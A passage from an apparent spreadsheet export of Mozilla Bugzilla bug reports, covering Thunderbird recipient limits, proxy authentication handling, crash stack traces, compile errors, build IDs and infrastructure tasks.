that many addresses from Access. Note: I did not actually send the message - not
wanting to upset all those users. I refer to an already logged bug - 113251
which may yet cause problems with too many recipients.
The process works with Thunderbird if there are not too many recipients eg 50
Also noted by another user: when cut/paste more than 200 addresses Thunderbird
responds with the following message:
The size of the message you are trying to send exceeds a temporary size limit
of the server. The message was not sent try to reduce the message size and try
again. The server responded: Too many recipients.
Reproducible: Always
Steps to Reproduce:
1.Issue the VBA code from the Access database
2.
3.
Actual Results:  
Error message - Too many Recipients 
Expected Results:  
Inserted all recipients into the To: box
Refer to Bug 113251</t>
  </si>
  <si>
    <t>www_gmc</t>
  </si>
  <si>
    <t>nigel_quayle</t>
  </si>
  <si>
    <t>MOZILLA_LABS-480374</t>
  </si>
  <si>
    <t>Snowl</t>
  </si>
  <si>
    <t>sources people disappear after upgrading from 0.2 to tip</t>
  </si>
  <si>
    <t>After I upgraded from 0.2 to the code tip my sources stopped showing up in the collections view.  Their messages show up in the All Messages collection so they haven't disappeared but the sources themselves aren't in the list.  Most people also don't show up in the list although a few of them (about 20 with a couple duplicates) do show up.</t>
  </si>
  <si>
    <t>CORE-268480</t>
  </si>
  <si>
    <t>###!!! ASSERTION: cannot set user:pass on no-auth url: 'Error' file r:/mozilla/netwerk/base/src/nsStandardURL.cpp line 1121</t>
  </si>
  <si>
    <t>###!!! ASSERTION: cannot set user:pass on no-auth url: 'Error' file
r:/mozilla/netwerk/base/src/nsStandardURL.cpp line 1121
Break: at file r:/mozilla/netwerk/base/src/nsStandardURL.cpp line 1121
 	xpcom_core.dll!nsDebug::Assertion(const char * aStr=0x012c800c const char *
aExpr=0x012c3fd4 const char * aFile=0x012c75c0 int aLine=0x00000461)  Line 109	C++
 	necko.dll!nsStandardURL::SetUserPass(const nsACString &amp; input={...})  Line
1121 + 0x1a	C++
&gt;	docshell.dll!nsDefaultURIFixup::CreateExposableURI(nsIURI * aURI=0x0111cdaa
nsIURI * * aReturn=0x011245c4)  Line 140	C++
 	xpcom_core.dll!XPTC_InvokeByIndex(nsISupports * that=0x017a3990 unsigned int
methodIndex=0x00000003 unsigned int paramCount=0x00000002 nsXPTCVariant *
params=0x0012e53c)  Line 102	C++
 	xpc3250.dll!XPCWrappedNative::CallMethod(XPCCallContext &amp; ccx={...}
XPCWrappedNative::CallMode mode=CALL_METHOD)  Line 2037 + 0x15	C++
 	xpc3250.dll!XPC_WN_CallMethod(JSContext * cx=0x02de5540 JSObject *
obj=0x031443b0 unsigned int argc=0x00000001 long * argv=0x02da97f8 long *
vp=0x0012e7ac)  Line 1287 + 0xa	C++
 	js3250.dll!js_Invoke(JSContext * cx=0x0012e3a8 unsigned int argc=0x0111cdaa
unsigned int flags=0x011245c4)  Line 1286 + 0x11	C
 	js3250.dll!js_Interpret(JSContext * cx=0x0111cdaa long * result=0x011245c4) 
Line 3502	C
 	js3250.dll!js_Invoke(JSContext * cx=0x0012e3a8 unsigned int argc=0x0111cdaa
unsigned int flags=0x011245c4)  Line 1306 + 0xa	C
 	xpc3250.dll!nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS *
wrapper=0x003673ca unsigned short methodIndex=0xe3a8 const nsXPTMethodInfo *
info=0x0111cdaa nsXPTCMiniVariant * nativeParams=0x011245c4)  Line 1413 + 0x10	C++
 	xpc3250.dll!nsXPCWrappedJS::CallMethod(unsigned short methodIndex=0x0005
const nsXPTMethodInfo * info=0x02e390b0 nsXPTCMiniVariant * params=0x0012ebc8)
 Line 450	C++
 	xpcom_core.dll!PrepareAndDispatch(nsXPTCStubBase * self=0x031e0190 unsigned
int methodIndex=0x00000005 unsigned int * args=0x0012ec8c unsigned int *
stackBytesToPop=0x0012ec7c)  Line 117 + 0x1a	C++
 	xpcom_core.dll!SharedStub()  Line 147	C++
 	appcomps.dll!nsBrowserStatusFilter::OnLocationChange(nsIWebProgress *
aWebProgress=0x0318c204 nsIRequest * aRequest=0x00000000 nsIURI *
aLocation=0x03205eb0)  Line 224	C++
 	docshell.dll!nsDocLoaderImpl::FireOnLocationChange(nsIWebProgress *
aWebProgress=0x0318c204 nsIRequest * aRequest=0x00000000 nsIURI *
aUri=0x03205eb0)  Line 1267 + 0x17	C++
 	docshell.dll!nsDocShell::SetCurrentURI(nsIURI * aURI=0x03205eb0)  Line 1367	C++
 	docshell.dll!nsDocShell::OnStateChange(nsIWebProgress * aProgress=0x0318c204
nsIRequest * aRequest=0x03141af8 unsigned int aStateFlags=0x03205eb0 unsigned
int aStatus=0x00000000)  Line 4196	C++
 	docshell.dll!nsDocLoaderImpl::FireOnStateChange(nsIWebProgress *
aProgress=0x0318c204 nsIRequest * aRequest=0x03141af8 int
aStateFlags=0x000f0001 unsigned int aStatus=0x00000000)  Line 1224 + 0x1a	C++
 	docshell.dll!nsDocLoaderImpl::doStartDocumentLoad()  Line 760	C++
 	docshell.dll!nsDocLoaderImpl::OnStartRequest(nsIRequest * request=0x00000001
nsISupports * aCtxt=0x00000000)  Line 512	C++
 	necko.dll!nsLoadGroup::AddRequest(nsIRequest * request=0x00000000 nsISupports
* ctxt=0x00000000)  Line 621	C++
 	gklayout.dll!nsHTMLDocument::CreateAndAddWyciwygChannel()  Line 3459	C++
 	gklayout.dll!nsHTMLDocument::OpenCommon(nsIURI * aSourceURI=0x031b3d88 const
nsACString &amp; aContentType={...} int aReplace=0x00000000)  Line 2079	C++
 	gklayout.dll!nsHTMLDocument::Open(const nsACString &amp; aContentType={...} int
aReplace=0x00000000 nsIDOMDocument * * aReturn=0x0012f244)  Line 2107 + 0x19	C++
 	gklayout.dll!nsHTMLDocumentSH::DocumentOpen(JSContext * cx=0x8000ffff
JSObject * obj=0x003673ca unsigned int argc=0x0012e3a8 long * argv=0x0111cdaa
long * rval=0x011245c4)  Line 5919 + 0x20	C++
 	js3250.dll!js_Invoke(JSContext * cx=0x0012e3a8 unsigned int argc=0x0111cdaa
unsigned int flags=0x011245c4)  Line 1286 + 0x11	C
 	js3250.dll!js_Interpret(JSContext * cx=0x0111cdaa long * result=0x011245c4) 
Line 3502	C
 	js3250.dll!js_Invoke(JSContext * cx=0x0012e3a8 unsigned int argc=0x0111cdaa
unsigned int flags=0x011245c4)  Line 1306 + 0xa	C
 	xpc3250.dll!nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS *
wrapper=0x003673ca unsigned short methodIndex=0xe3a8 const nsXPTMethodInfo *
info=0x0111cdaa nsXPTCMiniVariant * nativeParams=0x011245c4)  Line 1413 + 0x10	C++
 	xpc3250.dll!nsXPCWrappedJS::CallMethod(unsigned short methodIndex=0x0003
const nsXPTMethodInfo * info=0x017d1860 nsXPTCMiniVariant * params=0x0012f6bc)
 Line 450	C++
 	xpcom_core.dll!PrepareAndDispatch(nsXPTCStubBase * self=0x03067940 unsigned
int methodIndex=0x00000003 unsigned int * args=0x0012f780 unsigned int *
stackBytesToPop=0x0012f770)  Line 117 + 0x1a	C++
 	xpcom_core.dll!SharedStub()  Line 147	C++
 	websrvcs.dll!nsHTTPSOAPTransportCompletion::HandleEvent(nsIDOMEvent *
aEvent=0x011245c4)  Line 534	C++
 	xmlextras.dll!nsXMLHttpRequest::NotifyEventListeners(nsIDOMEventListener *
aHandler=0x02f8de70 nsISupportsArray * aListeners=0x00000001 nsIDOMEvent *
aEvent=0x030207e0)  Line 814	C++
 	xmlextras.dll!nsXMLHttpRequest::RequestCompleted()  Line 1372	C++
 	xmlextras.dll!nsXMLHttpRequest::OnStopRequest(nsIRequest * request=0x02e4dee8
nsISupports * ctxt=0x00000000 unsigned int status=0x00000000)  Line 1318	C++
 	necko.dll!nsHttpChannel::OnStopRequest(nsIRequest * request=0x030ba970
nsISupports * ctxt=0x00000000 unsigned int status=0x00000000)  Line 3760	C++
 	necko.dll!nsInputStreamPump::OnStateStop()  Line 505	C++
 	necko.dll!nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream *
stream=0x02ee3480)  Line 342	C++
 	xpcom_core.dll!nsInputStreamReadyEvent::EventHandler(PLEvent *
plevent=0x02dc8b2c)  Line 119	C++
 	xpcom_core.dll!PL_HandleEvent(PLEvent * self=0x02dc8b2c)  Line 693	C
 	xpcom_core.dll!PL_ProcessPendingEvents(PLEventQueue * self=0x01066650)  Line 628	C
 	xpcom_core.dll!nsEventQueueImpl::ProcessPendingEvents()  Line 395	C++
 	gkwidget.dll!nsWindow::DispatchPendingEvents()  Line 3721	C++
 	gkwidget.dll!nsWindow::ProcessMessage(unsigned int msg=0x00000104 unsigned
int wParam=0x00000054 long lParam=0x20140001 long * aRetValue=0x0012fce0) 
Line 4092	C++
 	gkwidget.dll!nsWindow::WindowProc(HWND__ * hWnd=0x00c42186 unsigned int
msg=0x00000104 unsigned int wParam=0x00000054 long lParam=0x02fc5f54)  Line
1355 + 0x10	C++
 	user32.dll!77d43a50() 	
 	user32.dll!77d43b1f() 	
 	user32.dll!TranslateMessage()  + 0xef	
 	user32.dll!GetMessageW()  + 0x125	
 	user32.dll!DispatchMessageW()  + 0xb	
 	appcomps.dll!nsAppStartup::Run()  Line 221	C++
 	mozilla.exe!main1(int argc=0x0012e3a8 char * * argv=0x0111cdaa nsISupports *
nativeApp=0x011245c4)  Line 1322	C++
 	mozilla.exe!main(int argc=0x00000001 char * * argv=0x003f7b80)  Line 1813 +
0x16	C++
 	mozilla.exe!mainCRTStartup()  Line 400 + 0x11	C
 	kernel32.dll!TermsrvAppInstallMode()  + 0x269	
0 [native frame]
1 anonymous(aWebProgress = [xpconnect wrapped nsIWebProgress @ 0x31e0b18]
aRequest = null aLocation = [xpconnect wrapped nsIURI @ 0x3225d90])
[chrome://navig
ator/content/nsBrowserStatusHandler.js:276]
    locationURI = null
    location = 
    browser = undefined
    userTypedValue = undefined
    blank = undefined
    hostPort = undefined
    popupIcon = undefined
    this = [object Object]
2 [native frame]
3 gotnews(resp = [xpconnect wrapped (nsISupports nsISOAPMessage
nsISOAPResponse) @ 0x2f38750] call = [xpconnect wrapped (nsISupports
nsISOAPMessage nsISOAP
Call) @ 0x300f758] status = 0 true)
[file:///r:/mozilla/extensions/webservices/soap/tests/soapheadlinenews.html:56]
    ret = [xpconnect wrapped (nsISupports nsISOAPBlock nsISOAPParameter) @
0x301b098]
    f = undefined
    detail = undefined
    ds = undefined
    detailStr = undefined
    this =
function gotnews(resp call status) {
    document.getElementById(BUTTON).value = Request News
    if (status != 0) {
        alert(Error completion:  + status)
    } else {
        if (resp.fault == null) {
            var ret = resp.getParameters(false {})
            nw = window.open(null null
status=notoolbar=nomenubar=nolocation=no)
            nw.document.open()
            nw.document.write(ret[0].value)
            nw.document.close()
        } else {
            var f = resp.fault
            var detail = f.detail
            var ds = new XMLSerializer()
            var detailStr = detail ? ds.serializeToString(detail) : 
            alert(Fault namespace:  + f.faultNamespaceURI + \nFault code:  +
f.faultCode + \nFault string:  + f.faultString + \nFault actor:  + f.faultA
ctor + \nDetail:  + detailStr)
        }
    }
    return true
}
4 [native frame]</t>
  </si>
  <si>
    <t>CORE-278885</t>
  </si>
  <si>
    <t>cache access denied from (ntlm) proxy on websites that require basic authentication</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 de-DE rv:1.7.5) Gecko/20050118 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 de-DE rv:1.7.5) Gecko/20050118 Firefox/1.0
In most cases I got directly a 301 after requesting a page secured by basic
authentication. I have been relocated to something like
www.example-domain.com/secure_area/ (from: www.example-domain.com/secure_area -
the slash was missing). Firefox sent a new request which was followed by a 407
from my proxy server. My proxy server offered me ntlm authentication and basic
authentication. Firefox chose ntlm and authenticated transparently. After that I
got a 401 - the webserver only offered basic authentication. Therefore Firefox
chose basic authentication. I entered the correct username and password and a
popup occured telling me to authenticate against my proxy server.
The first problem was that Firefox chose to use basic authentication to
authenticate against the proxy server because it had used it before to
authenticate against the webserver. I've made a change in
nsHttpChannel::GetCredentials that avoids that this selection is performed for
proxy authentication.
I think this change does not break anything because we can only use one proxy
(that requires authentication) anyways and it should not hurt anyone when we
choose the first authentication scheme that we support to authenticate against a
proxy server - just as in all the other requests.
After I had changed this behaviour it worked when requesting
www.example-domain.com/secure_area/ directly (not when requesting
www.example-domain.com/secure_area).
The second problem was that Firefox automatically sent the ntlm type 3 message
when requesting the secured page with basic credentials. It seems as it simply
takes it from the last request. Therefore I added a little check to
nsHttpChannel::ProccessAuthentication to ensure that this message would not be
sent before it has been requested. The ntlm authentication starts again and
everything works fine now.
I'm not very familiar with the mozilla code but I hope that this patch
nevertheless fits into the design of the mozilla code.
I know about https://bugzilla.mozilla.org/show_bug.cgi?id=211843 but because of
the date of the last message and because I'm posting a potential patch I thought
it would be no mistake to create a new bug report. In this bug report a similar
- but not identical - situation is described.
Reproducible: Sometimes
Steps to Reproduce:
1. Setup proxy server (I use squid) offering ntlm and basic authentication.
2. Browse website that requires basic authentication.
Actual Results:  
A popup will occur telling you to authenticate against your proxy server
although you have authenticated already using the ntlm authentication method.
Expected Results:  
After entering correct username and password for the basic authentication on the
requested website the secured content should appear.</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-570883</t>
  </si>
  <si>
    <t>Text view should be less sensitive to missing color ranges</t>
  </si>
  <si>
    <t>When the color ranges don't correspond to the actual ranges of text the text view throws exceptions during _drawLines (which causes the text to disappear). This hurts performance because we have to synchronously wipe out all attributes and fix ranges in the syntax manager on every keystroke. Profiling indicates that when editing jQuery over 60% of the time is spent wiping out repairing ranges (in _annotatePlainly). To avoid this the text view should gracefully degrade when confronted with incorrect color ranges.</t>
  </si>
  <si>
    <t>pwalton</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-520126</t>
  </si>
  <si>
    <t>[l10n: gl] updated main.lang file for www.mozilla.com</t>
  </si>
  <si>
    <t>Created attachment 404200
updated main.lang for mozilla.com
Galician updated main.lang file for www.mozilla.com</t>
  </si>
  <si>
    <t>dev.fjrial</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-336580</t>
  </si>
  <si>
    <t>Fix maxVersion on 1.8.0 branch</t>
  </si>
  <si>
    <t>Because we are a bit off-sync on the various 1_8_0* branches and 1.5.0.3 came a bit suddenly users have no XPI for 1.5.0.3: maxVersion is 1.5.0.2. :(
I think we should:
* set maxVersion on 1_8_0 to 1.5.0.*
* bump xpi version to 0.5.1
* push current 1_8_0 code to whichever branches these get built from:
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-mozilla1.8.0.3/
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-mozilla1.8.0.4/</t>
  </si>
  <si>
    <t>SEAMONKEY-26798</t>
  </si>
  <si>
    <t>Build IDs of non-official builds are misleading</t>
  </si>
  <si>
    <t>As it stands it appears that all builds of Mozilla display a Build ID string
at the bottom right of the browser window even when it is wrong and misleading.
Other than offical builds the current date and time is not used because
if it were the ID could be newer than the code that was build (see bug 24353
for that). 
On the other hand as it is *any* non-official build including those that
may get wide distribution like the Debian-frozen M12 binary which had the
nonsensical Build ID of 1999082316 (see bug 24799 and bug 22604) display
*some* Build ID.
The danger is that another non-official build might get wide distribution
with an out-of-date but believable Build ID a week or two old wreaking havoc 
on the ability of bug screeners to tell a regression from a DUP of a fixed
bug and for that matter a Milestone release from a nightly binary.
In general though it's a bad idea to be displaying inaccurate Build IDs
as both the Bug Writing Guidelines at 
http://www.mozilla.org/quality/bug-writing-guidelines.html
and the Bugzilla Helper at http://www.mozilla.org/quality/help/bug-form.html
ask for the Build ID string and asking for the identity of the build in more 
than one way is unlikely to be helpful for getting good info from beginning
bug reporters.
The better solution is probably along the lines of having a file deep in the
SeaMonkey tree overwritten with the Build ID string each hour by at least
two cron jobs running on at least two machines and then setting up the non-
official build process to interpolate the contents of that file rather than
using the build time for the build ID. That way if a day or two go by before
the build the ID will still reflect the age of the code but not ever be
older than the code.
A less preferable alternative would be to drop the Build ID display from 
builds that are more than n days more recent than the code built. Since the
Build ID is a number that gets used elsewhere too it couldn't be surpressed
itself so this would mean conditional compilation of the code that displays 
it complicating things. 
That's still better than collecting Build IDs in bug reports that are just 
plain *wrong* though from people who would never know the difference.</t>
  </si>
  <si>
    <t>sidr</t>
  </si>
  <si>
    <t>CCK_GRAVEYARD-263128</t>
  </si>
  <si>
    <t>CCK-General</t>
  </si>
  <si>
    <t>CCK_GRAVEYARD</t>
  </si>
  <si>
    <t>I would like to see CCK re-started. Can I help?</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1)
Build Identifier: 
I have been modifying Mozilla over the past month for a ~9000 user government 
installation in Australia. Our requirements are quite strict but so far I have 
had to do everything by hand.
I would like to see the CCK re-started even if I'm listed as the head of it. 
I'm not a full on developer so it would mean either putting up with my perl 
or getting the help of someone else.
I'd like to see this happen.
Reproducible: Always
Steps to Reproduce:
1. Search Google
2. Find no answers
3. Pull hair out.</t>
  </si>
  <si>
    <t>shrutiv</t>
  </si>
  <si>
    <t>jezza</t>
  </si>
  <si>
    <t>SEAMONKEY-6942</t>
  </si>
  <si>
    <t>libIDL tarball on ftp.mozilla.org not a release tarball</t>
  </si>
  <si>
    <t>the libIDL tarball on ftp.mozilla.org apparently isn't a release tarball so it
requires the person installing it to have libtool a modern lex and so on.  in
the interest of the simplified build couldn't this be a release tarball with a
pre-generated configure script and so on?</t>
  </si>
  <si>
    <t>mike+mozilla</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-388833</t>
  </si>
  <si>
    <t>Add a way to launch XUL applications from Firefox commandline</t>
  </si>
  <si>
    <t xml:space="preserve">Now that Firefox is libxul based we can launch XUL-based applications using its runtime. The launch code could be ported from XULRunner so Firefox could launch applications from its commandline kind of like the -chrome commandline parameter.
For example
firefox -app </t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-339332</t>
  </si>
  <si>
    <t>CCK</t>
  </si>
  <si>
    <t>Move error messages out of DTD and into properties</t>
  </si>
  <si>
    <t>I have some error messages in the DTD file that are causing problems for translations when they use certain characters.
I should move them into properties.
The are:
id.error
name.error
version.error
orgName.error
bmFolder.error
Basically if it displays in a message box I shouldn't be substituting it in the XUL and then using it in the JS file I should get it directly from properties.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-167090</t>
  </si>
  <si>
    <t>Old link to Bugzilla Helper</t>
  </si>
  <si>
    <t>The link to Bugzilla helper is outdated. 
Although it redirects to the right page it would look better if the bug writing
guidelines page was updated.</t>
  </si>
  <si>
    <t>TOOLKIT-522210</t>
  </si>
  <si>
    <t>stop dispatching the UpdatedScrollButtonsDisabledState event</t>
  </si>
  <si>
    <t>As of bug 497973 tabbrowser doesn't listen to the UpdatedScrollButtonsDisabledState event anymore. It doesn't seem universally useful so we should get rid of it. It's still used in comm-central but that's only because tabmail.xml is a tabbrowser.xml fork.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-326523</t>
  </si>
  <si>
    <t>Reject blatantly invalid CTCP PING responses</t>
  </si>
  <si>
    <t>In either a mis-understanding of the spec or an attempt to make itself look better NoNameScript for mIRC sends back its own timestamp in PING responses instead of the one we sent in the request. As a result of ChatZilla using a different timestamp format this results in meaningless ping times like 13174 days 15 hours 54 minutes 26.77 seconds.
I'm going to attach a patch that displays an error if the timestamp returned is obviously wrong. Other possible fixes would be lightly encrypting the timestamp to make extra sure it isn't messed with or only accepting responses if we've sent a ping request with the same timestamp.</t>
  </si>
  <si>
    <t>CORE-979705</t>
  </si>
  <si>
    <t>Mono sounds play through left speaker only</t>
  </si>
  <si>
    <t>User Agent: Mozilla/5.0 (Windows NT 6.1 WOW64 rv:28.0) Gecko/20100101 Firefox/28.0 (Beta/Release)
Build ID: 20140303165517
Steps to reproduce:
Open https://vine.co/v/MA7WgDqvqUD/embed. Click the button to unmute audio.
Actual results:
Audio plays through left speaker only.
Expected results:
Audio should play through all front speakers or at least left and right.</t>
  </si>
  <si>
    <t>Paul.Hancock.17041993</t>
  </si>
  <si>
    <t>vtqobex</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-767123</t>
  </si>
  <si>
    <t>talos-r4-lion-021 problem tracking</t>
  </si>
  <si>
    <t>Reobot needed</t>
  </si>
  <si>
    <t>rail</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-356707</t>
  </si>
  <si>
    <t>Need a VM to host a Mailman server for bugzilla.org</t>
  </si>
  <si>
    <t>From bug 356706:
-----
This will require a Mailman server with a distinct namespace from mozilla.org
(because some of the mailing list names coincide with lists on mozilla.org
just have a different domain on the end and mailman can't deal with that on
the same box).  Inbound can relay off dm-mail and be passed on to the mailman
server if it's list traffic.  This server will also need to be accessible via
ports 80 and 443.  A VM will probably work fine I can't imagine the traffic
level being that high.
-----
We're going to need another box (probably physical) at some point in the very near future to handle the same task for mozilla.org so we should probably come up with similar names for them. :)  dm-mailman* ?</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-387935</t>
  </si>
  <si>
    <t>ActionMonkey: Always build JS as C++</t>
  </si>
  <si>
    <t>In preparation for merging MMgc.
- Change both Makefile.ref and Makefile.in .
- Rename .c files to .cpp as appropriate.  (Use hg rename.)</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-374067</t>
  </si>
  <si>
    <t>Browse Extensions displays Firefox addons when in Thunderbird mode</t>
  </si>
  <si>
    <t>http://preview.addons.mozilla.org/en-US/thunderbird/browse/type:1 (Thunderbird Add-ons: Browse Extensions by Category) lists Download Statusbar NoScript and Forecastfox as Popular Extensions which are Firefox-only extensions. Same for New and Updated.
Same for the complete listing:
http://preview.addons.mozilla.org/en-US/thunderbird/browse/type:1/cat:all</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID-750706</t>
  </si>
  <si>
    <t>BasicHttpContext.java: dep induced javac -Werror failures</t>
  </si>
  <si>
    <t>/local/mozilla/bugs/748470/mobile/android/base/httpclientandroidlib/protocol/BasicHttpContext.java:44: warning: [rawtypes] found raw type: Map
  missing type arguments for generic class ArrayList
  where E is a type-variable:
    E extends Object declared in class ArrayList
/local/mozilla/bugs/748470/mobile/android/base/httpclientandroidlib/protocol/BasicHttpContext.java:76: warning: [unchecked] unchecked call to put(KV) as a member of the raw type Map
  where E is a type-variable:
    E extends Object declared in interface List</t>
  </si>
  <si>
    <t>CORE-237587</t>
  </si>
  <si>
    <t>Compile failure for extensions/negotiateauth/nsHttpGssapiAuth.cpp</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U OSF1 alpha en-US rv:1.7b) Gecko/20040313
Build Identifier: Mozilla/5.0 (X11 U OSF1 alpha en-US rv:1.7b) Gecko/20040313
Source file mozilla/extensions/negotiateauth/nsHttpGssapiAuth.cpp fails to
compile.  I am using C++ V6.5 on Tru64 V5.1B + patchkit 3.
2004-03-16 was my last successful trunk build.
The compiler error messages are:
cxx: Error: /usr/include/gssapi/compat.h line 293: this declaration has no
          storage class or type specifier
        error: the system type is undefined
--------^
cxx: Error: /usr/include/gssapi/compat.h line 293: expected a 
        error: the system type is undefined
-------------^
cxx: Warning: /usr/include/gssapi/iso/oid.h line 58: parsing restarts here
          after previous syntax error
    FAR* cs_mutable_oid_t
-------------------------^
cxx: Error: /usr/include/gssapi/iso/oid.h line 64: identifier
          cs_mutable_oid_desc is undefined
    cs_mutable_oid_desc FAR*    elem
----^
cxx: Error: /usr/include/gssapi/iso/oid.h line 75: identifier
          cs_mutable_oid_desc is undefined
    typedef cs_mutable_oid_desc cs_oid_desc
------------^
cxx: Error: /usr/include/gssapi/iso/oid.h line 76: identifier
          cs_mutable_oid_t is undefined
    typedef cs_mutable_oid_t    cs_oid_t
------------^
cxx: Error: nsHttpGssapiAuth.cpp line 195: class _cs_mutable_oid_set_desc
          has no member count
    for (i=0 icount  i++) {
--------------------------^
cxx: Error: nsHttpGssapiAuth.cpp line 196: class _cs_mutable_oid_set_desc
          has no member elements
        item = 
--------------------------^
cxx: Error: nsHttpGssapiAuth.cpp line 366: identifier gss_nt_service_name
          is undefined
                                   gss_nt_service_name
-----------------------------------^
cxx: Info: 8 errors detected in the compilation of nsHttpGssapiAuth.cpp.
Reproducible: Always
Steps to Reproduce:
1. Try to build mozilla from the trunk
2.
3.</t>
  </si>
  <si>
    <t>jim.brown</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-707701</t>
  </si>
  <si>
    <t>move join.mozilla.org to phx1</t>
  </si>
  <si>
    <t>We need to move join.mozilla.org from the sjc1 generic cluster to the phx1 generic cluster.</t>
  </si>
  <si>
    <t>jcrowe</t>
  </si>
  <si>
    <t>cshields</t>
  </si>
  <si>
    <t>FIREFOX-395249</t>
  </si>
  <si>
    <t>switch nsSessionStartup to XPCOMUtils</t>
  </si>
  <si>
    <t>It will be smaller this way.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-776466</t>
  </si>
  <si>
    <t>Commit Access (Level 1) for Georg Fritzsche</t>
  </si>
  <si>
    <t>Created attachment 644879
Public key
Requesting Level 1 for try access etc.
Potential vouchers CC'd.</t>
  </si>
  <si>
    <t>gfritzsche</t>
  </si>
  <si>
    <t>BUGZILLA-505039</t>
  </si>
  <si>
    <t>Use $user-&gt;is_timetracker instead of $user-&gt;in_group(Bugzilla-&gt;params-&gt;{'timetrackinggroup'})</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #505038 +++
Bugzilla-&gt;params-&gt;{'timetrackinggroup'}
  &amp;&amp; $user-&gt;in_group(Bugzilla-&gt;params-&gt;{'timetrackinggroup'})
should be replaced by $user-&gt;is_timetracker. That's shorter cleaner and less prone to errors. We should fix all places in the Bugzilla code which still doesn't use it yet.</t>
  </si>
  <si>
    <t>xquezme</t>
  </si>
  <si>
    <t>CORE-376924</t>
  </si>
  <si>
    <t>Traversing the accessible tree after changes to CSS display property can crash Firefox</t>
  </si>
  <si>
    <t>User-Agent:       Emacs-w3m/1.4.4 w3m/0.5.1+cvs-1.968
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a4pre) Gecko/20070408 Minefield/3.0a4pre
The attached sample page shows and hides a region by setting its CSS
display property to block or none. If the accessible tree is
traversed after a change from block to none Firefox under Linux
crashes. The attached javascript shell log shows the required steps.
The talkback report for this problem is 31019831.
On Windows with the exact same Minefield build (2007-04-08)
the problem does not occur in this simple case. I will attach a
comment for how to provoke a similar crash on Windows.
Reproducible: Always
Steps to Reproduce:
See the attached javascript shell log
Actual Results:  
Firefox crashes
Expected Results:  
The accessible tree should reflect the changes to the display
property and Firefox should not crash when the accessible tree is
traversed. 
Some information about the traversal of the accessibel tree:
The code used can be found in:
http://firemacs.googlecode.com/svn/trunk/tests/firefox/moz.js
The relevant functions are dumpAccessibleTree and
dumpAccessibleNode.
The first function will simply traverse the accessible tree
recursively calling the second fuction for each node.
dumpAccessibleNode will access finalRole name finalValue state extState and
description for each node. These accesses sometimes throw an
exception which does not make much sense to me. For provoking the
crash it is apparently important to actually access these node
properties i.e. if the line calling dumpAccessibleNode is commented
out in dumpAccessibleTre no crash occurs. In other words simply
walking the tree structure is not enough for a crash.</t>
  </si>
  <si>
    <t>listaddr1</t>
  </si>
  <si>
    <t>CORE-350748</t>
  </si>
  <si>
    <t>change nsIParserService to use nsStringGlue</t>
  </si>
  <si>
    <t>when --enable-libxul is turned on in the default build and c++ extensions are no longer allowed to build with MOZILLA_INTERNAL_API these extensions will no longer be able to use the services provided by nsIParserService due to string issues.  I have put together a patch will will remove nsString.h from nsIParserService and replace it with nsStringGlue.h.  I also had to change the signature of CheckQName to now take a nsAString instead of a fragmented string and slightly change how it uses Begin/EndReading.  No real functional changes though.  bsmedberg said that since strings are no longer fragmented then this is not an issue.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-114841</t>
  </si>
  <si>
    <t>Polish</t>
  </si>
  <si>
    <t>cu.com.pl - does not show the page</t>
  </si>
  <si>
    <t>the page is read but not displayed  except background.
They use javascript1.2 and it work fine in Netscape 4.76</t>
  </si>
  <si>
    <t>piskozub</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-454932</t>
  </si>
  <si>
    <t>assertion in nsVoidArray::FastElementAt() trying to find a connection in the cache</t>
  </si>
  <si>
    <t>Created attachment 338229
one possible approach
spun off from bug 436615
Here's the stack trace:
xpcom_core.dll!nsVoidArray::FastElementAt(int aIndex=4)  Line 73	C++
xpcom_core.dll!nsCOMArray_base::ObjectAt(int aIndex=4)  Line 101	C++
msgimap.dll!nsCOMArray::ObjectAt(int aIndex=4)  Line 161	C++
msgimap.dll!nsCOMArray::operator[](int aIndex=4)  Line 171	C++
msgimap.dll!nsImapIncomingServer::GetImapConnection(nsIEventTarget * aEventTarget=0x00cd3358 nsIImapUrl * aImapUrl=0x05c27de8 nsIImapProtocol * * aImapConnection=0x0012eabc)  Line 696 + 0x15 bytes	C++
msgimap.dll!nsImapIncomingServer::GetImapConnectionAndLoadUrl(nsIEventTarget * aClientEventTarget=0x00cd3358 nsIImapUrl * aImapUrl=0x05c27de8 nsISupports * aConsumer=0x00000000)  Line 416 + 0x2e bytes	C++
msgimap.dll!nsImapService::GetImapConnectionAndLoadUrl(nsIEventTarget * aClientEventTarget=0x00cd3358 nsIImapUrl * aImapUrl=0x05c27de8 nsISupports * aConsumer=0x00000000 nsIURI * * aURL=0x0012ecdc)  Line 2136 + 0x28 bytes	C++
